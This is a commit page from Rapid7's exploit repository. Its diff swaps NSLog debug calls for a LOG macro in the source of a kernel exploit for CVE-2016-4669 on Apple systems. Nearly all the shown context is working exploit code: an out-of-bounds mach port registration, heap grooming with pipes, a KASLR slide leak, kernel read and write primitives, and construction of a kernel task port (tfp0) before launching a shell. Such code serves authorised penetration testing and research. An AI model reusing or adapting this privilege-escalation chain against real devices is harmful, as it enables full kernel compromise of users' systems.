remove debug logging from the kernel exploit

rapid7 · Jul 30, 2020 · 117e587 · 117e587
1 parent 277d7dc
commit 117e587
Show file tree

Hide file tree

Showing 6 changed files with 89 additions and 92 deletions.
diff --git a/data/exploits/CVE-2016-4669/macho b/data/exploits/CVE-2016-4669/macho
diff --git a/external/source/exploits/CVE-2016-4669/macho.m b/external/source/exploits/CVE-2016-4669/macho.m
@@ -78,7 +78,7 @@
 {\
 	name = dlsym(RTLD_DEFAULT, ""#name"");\
 	if (!name) {\
-		NSLog(@"could not resolve " #name "");\
+		LOG("could not resolve " #name "");\
 		exit(-1);\
 	}\
 }\
@@ -152,7 +152,7 @@ void gc()
 {
 	kern_return_t kr = mach_zone_force_gc(mach_host_self());
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"zone gc failed: %d", kr);
+		LOG("zone gc failed: %d", kr);
 	      	exit(-1);	
 	}
 }
@@ -212,10 +212,10 @@ int mach_ports_register_oob()
 	// out of bounds.
 	kern_return_t kr = mach_ports_register_oob();
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"could not register oob");
+		LOG("could not register oob");
 		return NULL;
 	}
-	NSLog(@"oob port registered ");
+	LOG("oob port registered ");
 
 	// free the rest of the messages
 	for (int i=1; i<KALLOC_8_CNT; i++) { 
@@ -256,12 +256,12 @@ int find_port_pipe(int * pipes, unsigned *off)
 
 		int cnt = read(pipe[0], buf, sizeof(buf));
 		if (cnt != sizeof(buf)) {
-			NSLog(@"could not read pipe %d", i);
+			LOG("could not read pipe %d", i);
 			return -1;
 		}
 
 		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
-			NSLog(@"pipe write failed");
+			LOG("pipe write failed");
 			return -1;
 		}
 
@@ -282,12 +282,12 @@ int find_in_pipes(int *pipes, unsigned *off, bool (^find)(many_ptr_t *mp))
 
 		int cnt = read(pipe[0], buf, sizeof(buf));
 		if (cnt != sizeof(buf)) {
-			NSLog(@"could not read pipe %x, cnt: %d", i, cnt);
+			LOG("could not read pipe %x, cnt: %d", i, cnt);
 			return -1;
 		}
 
 		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
-			NSLog(@"pipe write failed");
+			LOG("pipe write failed");
 			return -1;
 		}
 
@@ -418,7 +418,7 @@ void kread(uint64_t from, void *to, size_t size)
         kern_return_t kr = mach_vm_read_overwrite(tfp0, off+from,
 		       	size, (mach_vm_offset_t)(off+to), &outsize);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_read_overwrite failed, left: %zu, kr: %d", szt, kr);
+		LOG("mach_vm_read_overwrite failed, left: %zu, kr: %d", szt, kr);
 		return;
 	}
         szt -= size;
@@ -447,7 +447,7 @@ uint32_t kr32(addr_t from)
 			&num);
 
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_read failed!\n");
+		LOG("mach_vm_read failed!\n");
 		return 0;
 	}
 	uint32_t val = *(uint32_t*)buf;
@@ -465,7 +465,7 @@ uint32_t kw32(addr_t to, uint32_t v)
 			(mach_msg_type_number_t)4);
 
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_write failed!\n");
+		LOG("mach_vm_write failed!\n");
 	}
 
 	return kr;
@@ -477,13 +477,13 @@ int kread0_32(addr_t addr, void *result, mach_port_t super_port,
 	kern_return_t kr = mach_port_set_context(mach_task_self(),
 		       	context_port, addr - 8);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_set_context failed: %d", kr);
+		LOG("mach_port_set_context failed: %d", kr);
 		return -1;
 	}
 
 	kr = pid_for_task(super_port, (int *)result);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"pid_for_task failed: %d", kr);
+		LOG("pid_for_task failed: %d", kr);
 		return -2;
 	}
 	return 0;
@@ -496,7 +496,7 @@ static void khexdump0(addr_t ptr, size_t n, mach_port_t port, mach_port_t ctx_po
 		kread0_32(ptr+i*4, &v1, port, ctx_port);
 		kread0_32(ptr+(i+1)*4, &v2, port, ctx_port);
 
-		NSLog(@"%08X %08X", v1, v2);
+		LOG("%08X %08X", v1, v2);
 	}
 }
 
@@ -506,7 +506,7 @@ static void khexdump(addr_t ptr, size_t n)
 		uint32_t v1, v2;
 		v1 = kr32(ptr+i*4);
 		v2 = kr32(ptr+(i+1)*4);
-		NSLog(@"%08X %08X", v1, v2);
+		LOG("%08X %08X", v1, v2);
 	}
 }
 
@@ -543,7 +543,7 @@ io_service_t alloc_x10_alloc(void *xml)
 			&i);
 
 	if (kr != KERN_SUCCESS || another_error != KERN_SUCCESS) {
-		NSLog(@"io_service_add_notification_ool failed %d, %d",
+		LOG("io_service_add_notification_ool failed %d, %d",
 				kr, another_error);
 		return MACH_PORT_NULL;
 	}	
@@ -630,13 +630,13 @@ int main(int argc, char** argv)
 	resolve(mach_vm_deallocate);
 
 	kr = IOMasterPort(MACH_PORT_NULL, &master);
-	NSLog(@"master port: %x, kr: %d\n", master, kr);
+	LOG("master port: %x, kr: %d\n", master, kr);
 
 	// First we stop all other thread to reduce the "noise"
 	for_other_threads(^(thread_act_t t) {
 		kern_return_t kr = thread_suspend(t);
 		if (kr != KERN_SUCCESS) 
-			NSLog(@"could not suspend a thread");
+			LOG("could not suspend a thread");
 	});
 
 	// Set file limit for our process as high as possible,
@@ -672,7 +672,7 @@ int main(int argc, char** argv)
 
 	// create pipe files first
 	if (pipes_create((int *)pipes, PIPES_CNT) < 0) {
-		NSLog(@"could not create pipes");
+		LOG("could not create pipes");
 		return -1;
 	}
 
@@ -716,12 +716,12 @@ int main(int argc, char** argv)
 	// ip_srights field.
 	kr = mach_ports_lookup(mach_task_self(), (mach_port_t **)&ports, &cnt);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_ports_lookup failed %x\n", kr);
+		LOG("mach_ports_lookup failed %x\n", kr);
 		return -1;
 	}
 
 	super_port = ports[2];
-	NSLog(@"got fake pipe port: %d", super_port);
+	LOG("got fake pipe port: %d", super_port);
 
 	// offset within the page where the super port used to reside.
 	unsigned pipe_off;
@@ -731,9 +731,9 @@ int main(int argc, char** argv)
 	int pipe_idx = find_port_pipe((int *)pipes, &pipe_off);
 
 	if (pipe_idx >= 0) {
-		NSLog(@"got port pipe %d, off: %04x\n", pipe_idx, pipe_off);
+		LOG("got port pipe %d, off: %04x\n", pipe_idx, pipe_off);
 	} else {
-		NSLog(@"could not find port pipe");
+		LOG("could not find port pipe");
 		exit(-1);
 	}
 
@@ -749,7 +749,7 @@ int main(int argc, char** argv)
 	// 
 	// We use method described in [3] to get kernel ASLR slide.
 	addr_t slide = get_kaslr_slide(super_port, super_pipe, pipe_off);
-	NSLog(@"slide: %08lx", slide);
+	LOG("slide: %08lx", slide);
 
 	// Now we want to get kernel read using pid_for_task trap trick.
 	// The details on that can be found in [2]. 
@@ -797,7 +797,7 @@ int main(int argc, char** argv)
 				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 
 		if (kr != KERN_SUCCESS) {
-			NSLog(@"mach_port_request_notification failed, %x", kr);
+			LOG("mach_port_request_notification failed, %x", kr);
 		}
 	}
 
@@ -811,7 +811,7 @@ int main(int argc, char** argv)
 				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 
 		if (kr != KERN_SUCCESS) {
-			NSLog(@"mach_port_request_notification failed, %x", kr);
+			LOG("mach_port_request_notification failed, %x", kr);
 		}
 	}
 
@@ -879,7 +879,7 @@ int main(int argc, char** argv)
 			MACH_NOTIFY_DEAD_NAME, 0, notify_port, 
 			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		LOG("mach_port_request_notification failed kr: %x", kr);
 		exit(-1);
 	}
 
@@ -888,7 +888,7 @@ int main(int argc, char** argv)
 	super_port_read(super_pipe, pipe_off, ^(many_ptr_t *mp) {
 		ip_requests = mp->p32[off32(IPC_PORT_ip_requests)];
 	});
-	NSLog(@"got ip_requests: %lx", ip_requests);
+	LOG("got ip_requests: %lx", ip_requests);
 
 	// -8 we need for +8 pid offset in proc structure.
 	// + 8 is for second ipc_port_request record.
@@ -932,10 +932,10 @@ int main(int argc, char** argv)
 	addr_t notify_port_addr;
 	kr = pid_for_task(super_port, (int *)&notify_port_addr);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"pid_for_task failed");
+		LOG("pid_for_task failed");
 		exit(-1);
 	}
-	NSLog(@"notify addr: %lx", notify_port_addr);
+	LOG("notify addr: %lx", notify_port_addr);
 	// Update the content of the task port so when we call pid_for_task
 	// it's going to use the value of notify_port ip_context field
 	// as bsd_info.
@@ -945,22 +945,22 @@ int main(int argc, char** argv)
 
 	uint32_t dummy = 0;
 	if (kread0_32(koffsets.base + slide, &dummy, super_port, notify_port) < 0) {
-		NSLog(@"early kernel read failed");
+		LOG("early kernel read failed");
 		exit(-1);
 	}
 	if (dummy != 0xFEEDFACE) {
-		NSLog(@"could not setup early kernel read");
+		LOG("could not setup early kernel read");
 		exit(-1);
 	}
-	NSLog(@"got early kernel read");
+	LOG("got early kernel read");
 
 	// remove our notification port, to be able to safely release the 
 	// super_port later on.
 	kr = mach_port_request_notification(mach_task_self(), super_port,
 			MACH_NOTIFY_DEAD_NAME, 0, MACH_PORT_NULL, 
 			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		LOG("mach_port_request_notification failed kr: %x", kr);
 		exit(-1);
 	}
 
@@ -971,7 +971,7 @@ int main(int argc, char** argv)
 		       	super_port, notify_port) < 0) {
 		exit(0);
 	}
-	NSLog(@"kernel_task: %lx", kernel_task);
+	LOG("kernel_task: %lx", kernel_task);
 
 	addr_t kernel_space;
 	addr_t kernel_itk_self;
@@ -980,28 +980,28 @@ int main(int argc, char** argv)
 	kread0_32(kernel_itk_self + IPC_PORT_receiver, (uint32_t *)&kernel_space,
 			super_port, notify_port);
 
-	NSLog(@"kernel_space: %lx", kernel_space);
+	LOG("kernel_space: %lx", kernel_space);
 
 	addr_t self_space;
 	kread0_32(notify_port_addr + IPC_PORT_receiver, &self_space,
 				super_port, notify_port);
 	addr_t super_port_addr = kread0_port_addr(self_space, super_port,
 		       	super_port, notify_port);
 
-	NSLog(@"super_port_addr: %lx", super_port_addr);
+	LOG("super_port_addr: %lx", super_port_addr);
 
 	// setup port for kernel task as outlined in [2]
 	super_port_to_tfp0(super_pipe, pipe_off, kernel_task, kernel_space,
 			super_port_addr);
-	NSLog(@"got tfp0");
+	LOG("got tfp0");
 	tfp0 = super_port;
 
 	// resume thread, otherwise we lose some of 
 	// objective-C runtime functionality.
 	for_other_threads(^(thread_act_t t) {
 		kern_return_t kr = thread_resume(t);
 		if (kr != KERN_SUCCESS) 
-			NSLog(@"could not resume a thread");
+			LOG("could not resume a thread");
 	});
 
 	shell_main(self_space, slide);